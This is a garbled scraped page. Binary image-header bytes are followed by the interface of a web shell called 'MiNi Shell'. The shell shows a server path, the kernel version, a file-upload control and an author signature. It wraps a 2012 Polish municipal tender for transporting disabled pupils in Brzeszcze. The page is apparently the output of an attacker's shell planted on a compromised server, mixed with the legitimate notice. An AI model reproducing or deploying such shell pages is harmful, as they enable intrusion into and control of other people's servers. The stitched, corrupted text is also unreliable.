JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121217/266839-N-2012.html

<p class="kh_header"><b>Brzeszcze: Wykonanie usługi przewozu uczniów niepełnosprawnych do Dziennego Ośrodka Rehabilitacyjno-Edukacyjno-Wychowawczego w Pszczynie, do Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu, transportem dostosowanym do przewozu osób niepełnosprawnych do Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu i na basen Pod Platanem w Brzeszczach.</b><br>
<b>Numer ogłoszenia: 266839 - 2012; data zamieszczenia: 17.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Gminy Brzeszcze , ul. Kościelna 4, 32-620 Brzeszcze, woj. małopolskie, tel. 032 7728500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzeszcze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi przewozu uczniów niepełnosprawnych do Dziennego Ośrodka Rehabilitacyjno-Edukacyjno-Wychowawczego w Pszczynie, do Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu, transportem dostosowanym do przewozu osób niepełnosprawnych do Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu i na basen Pod Platanem w Brzeszczach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje 4 zadania:


ZADANIE I - przewóz uczniów do Dziennego Ośrodka Rehabilitacyjno-Edukacyjno-Wychowawczego w Pszczynie

Zadanie obejmuje kurs: czyli dowóz 5 uczniów niepełnosprawnych oraz opiekuna w dniach nauki i zgodnie z organizacją roku szkolnego 2012/2013 w okresie od 2 stycznia 2013 r. do 31 lipca 2013 r. do Dziennego Ośrodka Rehabilitacyjno-Edukacyjno-Wychowawczego w Pszczynie ul. Antesa 1.  
Trasa dowozu to kolejno przystanki: począwszy od przystanku w Brzeszczach na ul. Dworcowej obok Banku Śląskiego,  Skidziń ul. Oświęcimska,  Jawiszowice ul. Nawsie, Brzeszcze Bór ul. Partyzantów, a następnie odwóz uczniów po zajęciach szkolnych lub zajęciach pozalekcyjnych w odwrotnej kolejności, zgodnie z rozkładem zajęć szkolnych (zajęcia dodatkowe i zajęcia edukacyjne) w roku szkolnym 2012/2013. Szczegółowy rozkład zajęć szkolnych przedstawi Dyrektor Dziennego Ośrodka Rehabilitacyjno-Edukacyjno-Wychowawczego w Pszczynie na 5 dni przed datą rozpoczęcia dowozu. Przewiduje się nie więcej niż 144 kursów w okresie realizacji zamówienia. Samochód przewożący uczniów musi być wyposażony w urządzenia spełniające wymogi prawne obowiązujące w tym zakresie: specjalistyczny podnośnik lub wjazd - pochylnię umożliwiające zajęcie miejsca osobom poruszającym się na wózku inwalidzkim. Zamawiający zastrzega możliwość zmiany liczby dzieci oraz trasy przejazdu w czasie trwania umowy.

ZADANIE II - przewóz uczniów do Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu

Zadanie obejmuje kurs: czyli dowóz 19 uczniów i dwóch opiekunów w dniach nauki zgodnie z organizacją roku szkolnego 2012/2013 w okresie od 2 stycznia 2013 r. do 28 czerwca 2013 r. do Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu ulica Obozowa 40 (część uczniów) i ul. Kościelna 6 (pozostała część).
Trasa dowozu to kolejno przystanki: począwszy od przystanku w Brzeszczach na ul. Mickiewicza obok Ośrodka Kultury, ul. Turystyczna przystanek koło sklepu Lidl,  ul. Daszyńskiego przystanek koło byłej kopalni Jawiszowice,  następnie ul. Kościuszki obok restauracji Słowiańska, ul. Ofiar Oświęcimia przystanek koło piekarni i stacji benzynowej Lotos, następnie Brzeszcze-Bór obok kaplicy, a następnie odwóz uczniów po zajęciach szkolnych lub zajęciach pozalekcyjnych w odwrotnej kolejności, zgodnie z rozkładem zajęć szkolnych (zajęcia dodatkowe i zajęcia edukacyjne) w danym roku szkolnym. Szczegółowy rozkład zajęć szkolnych przedstawi Dyrektor Specjalnego Ośrodka Szkolno-Wychowawczego na 5 dni przed datą rozpoczęcia dowozu. Przewiduje się nie więcej niż 111 kursów w ciągu realizacji zamówienia. Zamawiający zastrzega możliwość zmiany liczby dzieci oraz trasy przejazdu w czasie trwania umowy.


ZADANIE III - przewóz uczniów transportem dostosowanym do przewozu osób niepełnosprawnych do Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu

Zadanie obejmuje kurs: czyli dowóz 3 uczniów wraz z opiekunem transportem przystosowanym do przewozu osób niepełnosprawnych. Transport przystosowany do przewozu osób siedzących na wózkach inwalidzkich w trakcie ww. transportu oraz w fotelikach samochodowych w dniach nauki i zgodnie z organizacją roku szkolnego 2012/2013 w okresie od 2 stycznia 2013 r. do 28 czerwca 2013 r. do Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu ulica Obozowa 40.  
Trasa dowozu to: z miejsca zamieszkania w Brzeszczach oraz w Jawiszowicach do Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu, ulica Obozowa 40 w ilości 37 km, a następnie odwóz uczniów po zajęciach szkolnych lub zajęciach pozalekcyjnych w odwrotnej kolejności, zgodnie z rozkładem zajęć szkolnych (zajęcia dodatkowe i zajęcia edukacyjne) w danym roku szkolnym. Szczegółowy rozkład zajęć szkolnych przedstawi Dyrektor Specjalnego Ośrodka Szkolno Wychowawczego na 5 dni przed datą rozpoczęcia dowozu. Przewiduje się nie więcej niż 111 kursów w okresie realizacji zamówienia. Samochód przewożący uczniów musi być wyposażony w urządzenia spełniające wymogi prawne obowiązujące w tym zakresie: specjalistyczny podnośnik lub wjazd - pochylnię umożliwiające zajęcie miejsca osobom poruszającym się na wózku inwalidzkim, jak również osprzęt zapewniający możliwość unieruchomienia osób na wózku. Zamawiający zastrzega możliwość zmiany liczby dzieci oraz trasy przejazdu w czasie trwania umowy.


ZADANIE IV - przewóz uczniów na basen Pod Platanem w Brzeszczach

Zadanie obejmuje kurs: czyli dowóz dzieci wraz z opiekunami z placówek oświatowych na basen Pod Platanem w Brzeszczach, ul. Ofiar Oświęcimia 39a. Dowozy będą odbywały się dwa razy w tygodniu w roku szkolnym 2012/2013 w okresie od 2 stycznia 2013 r. do 28 czerwca 2012 r. Zadanie obejmuje również odwóz dzieci z powrotem do placówek. Dyrektorzy szkół przedstawią dni i godziny dowozów z tym, że będą to dwa dni w tygodniu zgodnie z organizacją roku szkolnego 2012/2013. Placówki i ilości dzieci które obejmuje zadanie:
ZSP nr 6 - Szkoła Podstawowa w Jawiszowicach, ul. Kusocińskiego 1- 44 dzieci
ZSP nr 5 - Szkoła Podstawowa nr 2 w Brzeszczach, ul. Mickiewicza 3 - klasa a - 24 dzieci
ZSP nr 5 - Szkoła Podstawowa nr 2 w Brzeszczach, ul. Mickiewicza 3 - klasa b - 24 dzieci
ZSP nr 5 - Szkoła Podstawowa nr 2 w Brzeszczach, ul. Mickiewicza 3 - klasa  c - 24 dzieci
ZSP nr 1 - Szkoła Podstawowa w Przecieszynie, ul. Wyzwolenia 54 a - 13 dzieci
ZSP nr 2 - Szkoła Podstawowa w Zasolu, ul Kostka Jagiełły 8 - 13 dzieci
ZSP nr 3 - Szkoła Podstawowa w Skidziniu, ul. Oświęcimska 39 - 15 dzieci

dla 1. jest to jeden dowóz. 
dla 2,3,4 są to trzy dowozy. 
dla 5, 6, 7  to jeden dowóz 
Jeden kurs obejmuje wszystkie dowozy i odwozy zawarte w punktach od 1 do 7.
Przewiduje się nie więcej niż 48 kursów w okresie realizacji zamówienia.
Zamawiający zastrzega możliwość zmiany liczby dzieci oraz trasy przejazdu w czasie trwania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówienia uzupełniającego, o którym mowa wg kryteriów art. 67 ust. 1 pkt 6  ustawy Prawo Zamówień Publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.14.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda przedłożenia w ofercie  Licencji na wykonywanie krajowego transportu drogowego przewozu osób</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda przedłożenia w ofercie wykazu wykonanych- a w przypadku świadczeń okresowych lub ciągłych również wykonywanych- usług  w okresie ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością  usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu,  dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi  te zostały wykonane należycie.
Warunkiem spełnienia jest wykazanie co najmniej 2 usług o wartości nie mniejszej, niż 60% zaoferowanej ceny brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedłożenie w ofercie wykazu sprzętu transportowego (autobusy, mikrobusy), którym dysponuje oferent do przewozu uczniów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych przypadkach:
ZMIANY OGÓLNE:
Możliwa jest:
a) zmiana adresu/siedziby Zamawiającego/Wykonawcy,
zmiana osób występujących po stronie Zamawiającego/Wykonawcy,
zmiana terminu realizacji zadań.
zmiana będąca skutkiem poprawy oczywistej omyłki.

ZMIANY RZUTUJĄCE NA TERMIN WYKONANIA UMOWY
A) Możliwa jest zmiana terminu wykonania umowy, ze względu na:
niesprzyjające warunki atmosferyczne,
działania sił natury uznane za stan klęski żywiołowej.
B) Zamawiający nie przedłuży terminu zakończenia umowy, jeśli przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy.

Określa się następujący tryb dokonywania zmian postanowień umowy:
1. Sposób inicjowania zmian:
A) Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany,
Zamawiający wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany,
2. Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo Wykonawcy, protokół konieczności, itp.). 
W rezultacie dokonania czynności opisanych powyżej może dojść do podpisania przez strony aneksu do umowy. Projekt aneksu przygotuje Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzeszcze.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Brzeszczach.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.12.2012 godzina 09:00, miejsce: Sekretariat  lub Informatorium Urzędu Gminy w Brzeszczach, ul. Kościelna 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com